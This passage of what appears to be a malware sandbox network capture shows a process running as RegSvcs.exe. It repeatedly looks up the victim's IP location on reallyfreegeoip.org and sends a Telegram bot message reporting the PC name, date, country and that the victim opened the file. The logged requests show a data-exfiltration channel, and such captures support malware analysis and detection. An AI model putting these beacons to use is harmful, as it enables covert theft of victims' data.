                                                                                                          2025-01-10 17:46:45 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          9192.168.2.449751149.154.167.2204433328C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 17:46:46 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20and%20Time:%2011/01/2025%20/%2000:31:36%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20367706%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                          Host: api.telegram.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 17:46:47 UTC344INHTTP/1.1 404 Not Found
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 17:46:46 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 55
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 17:46:47 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          10192.168.2.449755104.21.64.14434048C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 17:46:50 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 17:46:51 UTC853INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:46:50 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 362
                                                                                                          Connection: close
                                                                                                          Age: 1846000
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          cf-cache-status: HIT
                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LDSiWa%2BOTRJdHwcynXRNpWFJGtgNspHxiONkYcQjMFEIc1338l1Eio4hOE38AciJiyj0CWzh%2BXHRcbUFZ46g2YV92pPcH5LeB4j14Vm5xLU0IDEwFSKNQ0dolIiwg9FcQ6wCwn33"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8ffe7d246b614414-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1738&min_rtt=1736&rtt_var=655&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1663817&cwnd=180&unsent_bytes=0&cid=29387f7145eb9f91&ts=170&x=0"
                                                                                                          2025-01-10 17:46:51 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          11192.168.2.449756104.21.64.14434048C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 17:46:51 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          2025-01-10 17:46:51 UTC861INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:46:51 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 362
                                                                                                          Connection: close
                                                                                                          Age: 1846000
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          cf-cache-status: HIT
                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wwouYBO1YdwU6iiQELVde8P%2BHgow%2FbRfe7aGjn%2B108GrnuXb%2Fxz%2FOyaWJMUr6Wf1YhIiTUhzVPSvr6IexxZykW9DLBfFF4MKt3hY%2BaY9RdxiouADjaACbN1pVO8qMbg5GnsP5qFC"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8ffe7d29cceec358-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1778&min_rtt=1690&rtt_var=697&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1727810&cwnd=155&unsent_bytes=0&cid=49914c0cc1062f47&ts=158&x=0"
                                                                                                          2025-01-10 17:46:51 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          12192.168.2.449758104.21.64.14434048C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 17:46:53 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          2025-01-10 17:46:53 UTC861INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:46:53 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 362
                                                                                                          Connection: close
                                                                                                          Age: 1846002
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          cf-cache-status: HIT
                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XLCxHnbgKseVm8anToNbdLN4AGRI4CWRjzC1HqAiz%2Fm7uRqfoZxErfXV%2B%2BKsXpomiDMEp5DaVm0kOFmQixunAAvhAZ%2BQc6Fm3GCPmf5euZX7MK3o6ry33FhGVxD5EcgCP381huf%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8ffe7d344a77de95-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=34284&min_rtt=32327&rtt_var=16037&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=60853&cwnd=243&unsent_bytes=0&cid=1e87b7b9ab5b948d&ts=272&x=0"
                                                                                                          2025-01-10 17:46:53 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          13192.168.2.449761104.21.64.14434048C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 17:46:54 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 17:46:54 UTC861INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:46:54 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 362
                                                                                                          Connection: close
                                                                                                          Age: 1846004
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          cf-cache-status: HIT
                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tz16wgm9lo4fJxSTSChAHELrat0zeGE1HNyPfvre2RxQkbfDcyOuXFjGSuw2pftz7%2F%2B8rlk2uldsI4y3V4aX%2F3QX7gyotLbF3Vz%2BTIpZ6QkxgfWsxIxdp4Y%2B8MKbD%2BTy6RcVcumv"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8ffe7d3d5d27c358-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1740&min_rtt=1657&rtt_var=788&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1255913&cwnd=155&unsent_bytes=0&cid=8d2810a62bb454f0&ts=274&x=0"
                                                                                                          2025-01-10 17:46:54 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          14192.168.2.449763104.21.64.14434048C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 17:46:56 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          2025-01-10 17:46:56 UTC851INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:46:56 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 362
                                                                                                          Connection: close
                                                                                                          Age: 1846005
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          cf-cache-status: HIT
                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9ojz5DxwOPeuQMvwetprcawYASiyUhTgGMTPhipLlr6XEOK7X3OTuOhLojWxBHQV1oDCsauTHdqHSq9oohgje9JgZC4Lxu0kAqRmGXX3EZkJgFrfKPyQSNfQ%2FvXmOFyG2JtTYpPh"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8ffe7d459f527c6a-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2213&min_rtt=1998&rtt_var=903&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1461461&cwnd=218&unsent_bytes=0&cid=597a17fc690332dc&ts=165&x=0"
                                                                                                          2025-01-10 17:46:56 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          15192.168.2.449765104.21.64.14434048C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 17:46:57 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 17:46:57 UTC859INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:46:57 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 362
                                                                                                          Connection: close
                                                                                                          Age: 1846006
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          cf-cache-status: HIT
                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sO%2B2PQX6a816e2ycE3uSRZ2Jgb4x6meLD%2FNRLIYDg6Df7sIiT6jHFDmnFneWxRsQrqigFmsaInU%2BQEJjg7LPLMedEBEMJtLOW36vQQIHOQsTN3e6c2P%2F4HHytSGiCO44EuRO%2Fx7d"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8ffe7d4dafea42e9-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1918&min_rtt=1683&rtt_var=799&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1734997&cwnd=240&unsent_bytes=0&cid=33d9b817164cb747&ts=158&x=0"
                                                                                                          2025-01-10 17:46:57 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          16192.168.2.449767104.21.64.14434048C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 17:46:58 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          2025-01-10 17:46:58 UTC861INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:46:58 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 362
                                                                                                          Connection: close
                                                                                                          Age: 1846008
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          cf-cache-status: HIT
                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Toi1Kt%2F%2BK37DQFGoUr8AStuw577bbfbQ3NZOGg4%2BwDCN2xvRkdkT0zqnO2SeVR%2FJNYw8%2BvNNoK1ud2WwqhB0chr0UybsDhz%2BqEBOVeTD6FM4ThwSQYI6RBldt40b3Ey3zZh2t4iW"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8ffe7d55e9ce42e9-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1691&min_rtt=1691&rtt_var=635&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1721698&cwnd=240&unsent_bytes=0&cid=3f59ee3dadc52d65&ts=154&x=0"
                                                                                                          2025-01-10 17:46:58 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          17192.168.2.449769104.21.64.14434048C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 17:47:00 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 17:47:00 UTC856INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 17:47:00 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 362
                                                                                                          Connection: close
                                                                                                          Age: 1846009
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          cf-cache-status: HIT
                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VB1oh6GtJzR1vR7Y6jzqHh4CaQxSjp5uuhhxv666TSsCFTnkHXaY%2FENMSEpxzsQyMXnKp8N%2BYkugiAWq6FOUChvNAs1zfE2iLpX35UFE2W5vfAUux0RdKaAkZ7x1ocP5b2MP%2F6KN"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8ffe7d5f3e9f4414-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4112&min_rtt=1963&rtt_var=2217&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1487519&cwnd=180&unsent_bytes=0&cid=719044e77a2e761b&ts=162&x=0"
                                                                                                          2025-01-10 17:47:00 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          18192.168.2.449771104.21.64.14434048C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                          TimestampBytes transferredDirectionData
